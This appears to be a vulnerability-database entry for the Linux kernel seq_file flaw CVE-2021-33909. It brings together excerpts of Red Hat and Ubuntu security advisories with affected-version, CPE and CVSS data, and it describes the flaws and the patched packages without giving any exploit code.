[4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified 1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve 1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn 1975672 - [4.8.0] Production logs are spammed on "Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient" 1975789 - worker nodes rebooted when we simulate a case where the api-server is down 1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s] 1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn't work - ingresscontroller "default" is degraded 1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted 1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts 1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO 1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1 1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO 1977352 - [4.8.0] [SNO] No DNS to cluster API from assisted-installer-controller 1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes 1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses 1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8 1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and redeploying assisted-service pod 1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used 1980788 - NTO-shipped stalld can segfault 1981633 - enhance service-ca injection 1982250 - Performance Addon Operator fails to install after catalog source becomes ready 1982252 - olm Operator is in CrashLoopBackOff state with error "couldn't cleanup cross-namespace ownerreferences"

  1. References:

https://access.redhat.com/security/cve/CVE-2016-2183 https://access.redhat.com/security/cve/CVE-2020-7774 https://access.redhat.com/security/cve/CVE-2020-15106 https://access.redhat.com/security/cve/CVE-2020-15112 https://access.redhat.com/security/cve/CVE-2020-15113 https://access.redhat.com/security/cve/CVE-2020-15114 https://access.redhat.com/security/cve/CVE-2020-15136 https://access.redhat.com/security/cve/CVE-2020-26160 https://access.redhat.com/security/cve/CVE-2020-26541 https://access.redhat.com/security/cve/CVE-2020-28469 https://access.redhat.com/security/cve/CVE-2020-28500 https://access.redhat.com/security/cve/CVE-2020-28852 https://access.redhat.com/security/cve/CVE-2021-3114 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3516 https://access.redhat.com/security/cve/CVE-2021-3517 https://access.redhat.com/security/cve/CVE-2021-3518 https://access.redhat.com/security/cve/CVE-2021-3520 https://access.redhat.com/security/cve/CVE-2021-3537 https://access.redhat.com/security/cve/CVE-2021-3541 https://access.redhat.com/security/cve/CVE-2021-3636 https://access.redhat.com/security/cve/CVE-2021-20206 https://access.redhat.com/security/cve/CVE-2021-20271 https://access.redhat.com/security/cve/CVE-2021-20291 https://access.redhat.com/security/cve/CVE-2021-21419 https://access.redhat.com/security/cve/CVE-2021-21623 https://access.redhat.com/security/cve/CVE-2021-21639 https://access.redhat.com/security/cve/CVE-2021-21640 https://access.redhat.com/security/cve/CVE-2021-21648 https://access.redhat.com/security/cve/CVE-2021-22133 https://access.redhat.com/security/cve/CVE-2021-23337 https://access.redhat.com/security/cve/CVE-2021-23362 https://access.redhat.com/security/cve/CVE-2021-23368 https://access.redhat.com/security/cve/CVE-2021-23382 https://access.redhat.com/security/cve/CVE-2021-25735 https://access.redhat.com/security/cve/CVE-2021-25737 https://access.redhat.com/security/cve/CVE-2021-26539 https://access.redhat.com/security/cve/CVE-2021-26540 https://access.redhat.com/security/cve/CVE-2021-27292 https://access.redhat.com/security/cve/CVE-2021-28092 https://access.redhat.com/security/cve/CVE-2021-29059 https://access.redhat.com/security/cve/CVE-2021-29622 https://access.redhat.com/security/cve/CVE-2021-32399 https://access.redhat.com/security/cve/CVE-2021-33034 https://access.redhat.com/security/cve/CVE-2021-33194 https://access.redhat.com/security/cve/CVE-2021-33909 https://access.redhat.com/security/updates/classification/#moderate

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ d4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26 Z7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs ImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h gep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8 TWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX X//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb 1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA mtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/ 0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6 dpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx +bLvJlpGiMg= =NJcM -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS
  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel. An attacker in a guest VM could use this to write to portions of the host’s physical memory. (CVE-2021-3653)

Maxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor implementation for AMD processors in the Linux kernel allowed a guest VM to disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker in a guest VM could use this to read or write portions of the host’s physical memory. (CVE-2021-3656)

Andy Nguyen discovered that the netfilter subsystem in the Linux kernel contained an out-of-bounds write in its setsockopt() implementation. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-22555)

It was discovered that the virtual file system implementation in the Linux kernel contained an unsigned to signed integer conversion error. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-33909)

Update instructions

The problem can be corrected by updating your kernel livepatch to the following versions:

Ubuntu 20.04 LTS gcp - 81.1 generic - 81.1 gke - 81.1 gkeop - 81.1 lowlatency - 81.1

Ubuntu 18.04 LTS generic - 81.1 gke - 81.1 gkeop - 81.1 lowlatency - 81.1 oem - 81.1

Ubuntu 16.04 ESM generic - 81.1 lowlatency - 81.1

Ubuntu 14.04 ESM generic - 81.1 lowlatency - 81.1

Support Information

Kernels older than the levels listed below do not receive livepatch updates. If you are running a kernel version earlier than the one listed below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS linux-aws - 5.4.0-1009 linux-azure - 5.4.0-1010 linux-gcp - 5.4.0-1009 linux-gke - 5.4.0-1033 linux-gkeop - 5.4.0-1009 linux-oem - 5.4.0-26 linux - 5.4.0-26

Ubuntu 18.04 LTS linux-aws - 4.15.0-1054 linux-gke-4.15 - 4.15.0-1076 linux-gke-5.4 - 5.4.0-1009 linux-gkeop-5.4 - 5.4.0-1007 linux-hwe-5.4 - 5.4.0-26 linux-oem - 4.15.0-1063 linux - 4.15.0-69

Ubuntu 16.04 ESM linux-aws - 4.4.0-1098 linux-azure - 4.15.0-1063 linux-azure - 4.15.0-1078 linux-hwe - 4.15.0-69 linux - 4.4.0-168 linux - 4.4.0-211

Ubuntu 14.04 ESM linux-lts-xenial - 4.4.0-168

References

  • CVE-2021-3653
  • CVE-2021-3656
  • CVE-2021-22555
  • CVE-2021-33909

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202107-1361",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.134"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.52"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.276"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13.4"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.19"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.276"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.240"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.43"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.198"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.52",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.19",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.13.4",
                "versionStartIncluding": "5.13",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.13",
                "versionStartIncluding": "3.12.43",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.276",
                "versionStartIncluding": "3.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.276",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.240",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.198",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.134",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-33909",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-33909",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-33909",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-33909",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.7) - ppc64, ppc64le, x86_64\n\n3. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nBug Fix(es):\n\n* [RHEL7.9.z] n_tty_open: \"BUG: unable to handle kernel paging request\"\n(BZ#1872778)\n\n* [ESXi][RHEL7.8]\"qp_alloc_hypercall result = -20\" / \"Could not attach to\nqueue pair with -20\" with vSphere Fault Tolerance enabled (BZ#1892237)\n\n* [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated DASD\nwith DIAG driver returns EOPNOTSUPP (BZ#1910395)\n\n* False-positive hard lockup detected while processing the thread state\ninformation (SysRq-T) (BZ#1912221)\n\n* RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or\nmore IFL (pci) (BZ#1917943)\n\n* The NMI watchdog detected a hard lockup while printing RCU CPU stall\nwarning messages to the serial console (BZ#1924688)\n\n* nvme hangs when trying to allocate reserved tag (BZ#1926825)\n\n* [REGRESSION] \"call into AER handling regardless of severity\" triggers\ndo_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)\n\n* Module nvme_core: A double free  of the kmalloc-512 cache between\nnvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)\n\n* sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at\nkernel/timer.c:1000! (BZ#1953052)\n\n* [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit\n2a7f8c3b1d3fee is needed (BZ#1953075)\n\n* Kernel panic at cgroup_is_descendant (BZ#1957719)\n\n* [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)\n\n* IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)\n\n* [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap\n[7.9.z] (BZ#1960193)\n\n* mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)\n\n* incorrect assertion on pi_state-\u003epi_mutex.wait_lock from\npi_state_update_owner() (BZ#1965495)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c\n1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function\n1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c\n1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan\n1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 